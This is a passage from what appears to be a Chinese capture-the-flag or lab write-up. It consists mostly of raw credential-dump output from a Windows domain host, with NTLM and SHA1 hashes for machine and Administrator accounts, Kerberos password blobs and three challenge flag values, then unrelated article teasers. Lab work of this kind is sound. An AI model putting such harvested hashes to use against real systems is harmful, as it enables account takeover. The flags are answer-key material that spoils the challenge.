         * Domain   : dog.local
         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 55884 (00000000:0000da4c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:12
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 5f82695a422af9105af8c29caa8406e6
         * SHA1     : 21fa78c558159124c9f55b1ab891d0426f2ee246
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 27 2d 17 f2 4b 16 db a8 ef d4 82 a5 49 dc f3 35 3e a8 d8 ad 08 73 fd 21 01 f5 2d b0 95 ec b2 5f 76 c1 ec e6 98 3f 41 54 af 9c 59 6c 6e 01 06 d3 b0 79 dc 42 c4 7f 3d a5 f3 61 ef fa 33 74 50 8c 84 9f 05 14 45 86 c0 4f 2f c6 8b 30 4f 4b 37 b4 ad 8d db ae eb 44 5d e4 39 e7 c3 be 6d f6 37 2e 41 ad 3f 35 3d a6 b8 1c e9 91 e6 f3 60 9d 21 c4 f8 9e 5f 0f 24 95 38 90 6b da 27 c0 2d 86 3a 5d 58 19 56 7f ad 68 3f 6e 4a de e2 fd 02 bd 0b af 06 3b 73 47 26 ab ce ba 72 96 ce 8f 21 1d 42 34 9a 5f 87 79 d5 20 07 63 b5 a9 ad 59 4d 96 6f 7f c8 d8 8f cd 0d 56 72 96 45 58 ad 55 66 f5 a4 6c 05 49 5b b2 fb e8 eb 5a 36 f2 9d 69 1f 69 fb b7 6f 19 43 01 43 c9 96 c4 18 73 24 52 ff 1c 15 62 3d 79 f3 6c 75 2e 38 28 07 5f 7f e0 e1 62 05 a0 
        ssp :   KO
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:00
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-mvne1sfj0lq$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 27364 (00000000:00006ae4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:58
SID               : 
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
        kerberos :
        ssp :   KO
        credman :

Authentication Id : 0 ; 40540109 (00000000:026a97cd)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 480371 (00000000:00075473)
Session           : Interactive from 1
User Name         : Administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/3 7:29:29
SID               : S-1-5-21-2515766443-2959740750-3575737072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         [00010000] CredentialKeys
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         [00010000] CredentialKeys
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:16
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 55865 (00000000:0000da39)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:11
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:52
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-mvne1sfj0lq$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

全部的sessions

32

flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F

flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F

flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

nType from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:12:52
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :


全部的sessions

[外链图片转存中...(img-AN9KgVtz-1727602850327)]



flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F


flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F


flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2177753.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

DialFRED基准:具有对话能力的具身智能Agent

目录 一、DialFRED数据集1.1 数据集规模与任务结构1.2 任务实例的构成1.3 人类标注的问答数据1.4 Oracle自动生成答案1.5 任务多样性与数据增强1.6 数据集的词汇多样性1.7 任务和环境的多样性 二、提问者-执行者框架2.1 框架概述2.2 提问者模型设计2.3 执行者模型设计2.4 强化学…

【读书笔记-《30天自制操作系统》-25】Day26

本篇仍然是围绕着命令行窗口做文章。首先优化命令行窗口的移动速度&#xff0c;然后增加多个命令行窗口功能。接着优化了命令行窗口的关闭&#xff0c;最后增加了两个命令start与ncst。 1. 优化命令行窗口移动速度 首先对命令行窗口的移动速度进行优化。主要的优化点有以下几…

WEB服务器——Tomcat

服务器是可以使用java完成编写&#xff0c;是可以接受页面发送的请求和响应数据给前端浏览器的&#xff0c;而在开发中真正用到的Web服务器&#xff0c;我们不会自己写的&#xff0c;都是使用目前比较流行的web服务器。 如&#xff1a;Tomcat 1. 简介 Tomcat 是一个开源的轻量…

二维数组的存放

今天我水的文章是二维数组的存放 二维数组的存放方式其实和一维数组没有区别&#xff0c;但如果想要更直观的了解&#xff0c;我们可以把它们的地址打印出来。 代码如下&#xff1a; #include <stdio.h> int main() {int arr[3][3];//二维数组&#xff0c;int数组类型…

【高效管理集合】并查集的实现与应用

文章目录 并查集的概念主要操作优化技术应用场景 并查集的实现基本框架并查集的主要接口总体代码 并查集的应用省份的数量等式方程的可满足性 总结 并查集的概念 并查集&#xff0c;也称为不相交集&#xff0c;是一种树形的数据结构&#xff0c;用于处理一些不相交集合的合并及…

ClickHouse | 查询

1 ALL 子句 2 ARRAY JOIN 使用别名 :在使用时可以为数组指定别名&#xff0c;数组元素可以通过此别名访问&#xff0c;但数组本身则通过原始名称访问 3 DISTINCT子句 DISTINCT不支持当包含有数组的列 4 FROM子句 FROM 子句指定从以下数据源中读取数据: 1.表 2.子…

建筑资质应该怎么选?

建筑资质是建筑企业承接工程项目的必备条件&#xff0c;它不仅关系到企业的市场竞争力&#xff0c;还直接影响到企业的经营效益。因此&#xff0c;选择适合自己企业的建筑资质至关重要。以下是一些选择建筑资质时需要考虑的关键因素&#xff1a; 1. 明确企业定位 首先&#x…

金融教育宣传月 | 平安养老险百色中心支公司开展金融知识“消保县域行”宣传活动

9月22日&#xff0c;平安养老险百色中心支公司积极落实国家金融监督管理总局关于开展金融教育宣传月活动的相关要求&#xff0c;联合平安人寿百色中心支公司共同组成了平安志愿者小队&#xff0c;走进百色市四塘镇百兰村开展了一场别开生面的金融消费者权益保护宣传活动。此次活…

如何给你的项目添加测试覆盖率徽章

看完我的测试教程之后&#xff0c;想必大家都能写出一个测试覆盖率极高的小项目了。测试覆盖率既然这么高&#xff0c;不秀一秀岂不是白瞎了&#xff0c;下面我们就来通过第三方服务来给你的项目加上测试覆盖率徽章&#xff0c;涉及到的内容有yaml配置&#xff0c;githubAction…

Vue下载pubsub-js中错误问题解决

错误&#xff1a; 解决方法&#xff1a; 执行&#xff1a; npm config set registry https://registry.npm.taobao.org我执行以上方法后安装成功

关于北斗卫星导航系统,你都了解多少?

北斗卫星导航系统&#xff08;简称“北斗系统”&#xff09;&#xff0c; 英文全称是&#xff1a;Beidou Navigation Satellite System&#xff08;简称&#xff1a;BDS&#xff09;&#xff0c; 研发 的 初衷 是中国着眼于国家安全和经济社会发展需要&#xff0c;选择自主研发…

Java类的生命周期-初始化阶段

Java类的生命周期-初始化阶段 前两篇讲述了类生命周期的加载阶段和连接阶段&#xff0c;那么本篇我们来讲最为重要的初始化阶段&#xff0c;借助字节码文件与大厂面试题更好的理解类的初始化 头篇提到&#xff0c;类的生命周期可疑将他分为五个阶段&#xff0c;本篇要讲述的就是…

RIP路由(已被淘汰)

一、rip 路由原理 RIP&#xff08;Routing Information Protocol&#xff0c;路由信息协议&#xff09;早期的动态路由协议&#xff0c;被广泛应用于TCP/IP网络中&#xff0c;尤其是在中小型网络中。基于距离矢量&#xff08;Distance-Vector&#xff09;算法来计算到达目的网络…

农场小程序带你走进生态农产品的世界

在快节奏的现代生活中&#xff0c;人们对食品安全的关注日益增强&#xff0c;对环境、健康农产品的需求也愈发迫切。然而&#xff0c;传统农产品市场往往信息不透明&#xff0c;消费者难以直接了解农产品的生长环境和生产过程&#xff0c;导致信任缺失。而农场小程序的出现&…

工程安全监测分析模型与智能算法模型方案

工程安全监测分析模型与智能算法模型 构建大坝安全监测智能分析模型&#xff0c;以大坝立体智能感知体系为依托&#xff0c;获取大坝变形、渗流渗压、环境变量等实时监测数据&#xff0c;作为模型输入&#xff0c;实现监测数据自动预处理、特征提取、误差分析、变化趋势分析等…

大模型增量训练--基于transformer制作一个大模型聊天机器人

针对夸夸闲聊数据集&#xff0c;利用UniLM模型进行模型训练及测试&#xff0c;更深入地了解预训练语言模型的使用方法&#xff0c;完成一个生成式闲聊机器人任务。 项目主要结构如下&#xff1a; data 存放数据的文件夹 dirty_word.txt 敏感词数据douban_kuakua_qa.txt 原始语…

Qt——如何创建一个项目

前言 本文主要通过实操带领大家来实现基础文件的操作&#xff0c;主要包括文件的打开&#xff0c;读取&#xff0c;写入&#xff0c;当然文件读写我们可以有几种不同的方式来进行操作&#xff0c;分别是文件流&#xff0c;字节流来进行的操作这里就需要两个类分别是文件流&…

迈威通信闪耀工博会,以创新科技赋能工业自动化

昨日&#xff0c;在圆满落幕的第24届中国国际工业博览会上&#xff0c;迈威通信作为工业自动化与智慧化领域的先行者&#xff0c;以“创新打造新质通信&#xff0c;赋能工业数字化”为主题精彩亮相&#xff0c;向全球业界展示了我们在工业自动化领域的最新成果与创新技术。此次…

elementUI表格中某个字段(state)使用计算属性进行转换为对应中文显示

代码案例&#xff1a; <template><el-table:data"tableData"style"width: 100%"><el-table-columnprop"date"label"日期"width"180"/><el-table-columnprop"name"label"姓名"wid…

count(1),count(*)与 count(‘列名‘) 的区别

文章目录 COUNT(expr)性能对比count(*) VS count(1)count(*) VS count(列名) count(*)会走索引吗MyISAM count优化InnoDB如何处理count(*)总结 参考官方文档&#xff1a; https://dev.mysql.com/doc/refman/8.4/en/aggregate-functions.html#function_count COUNT(expr) coun…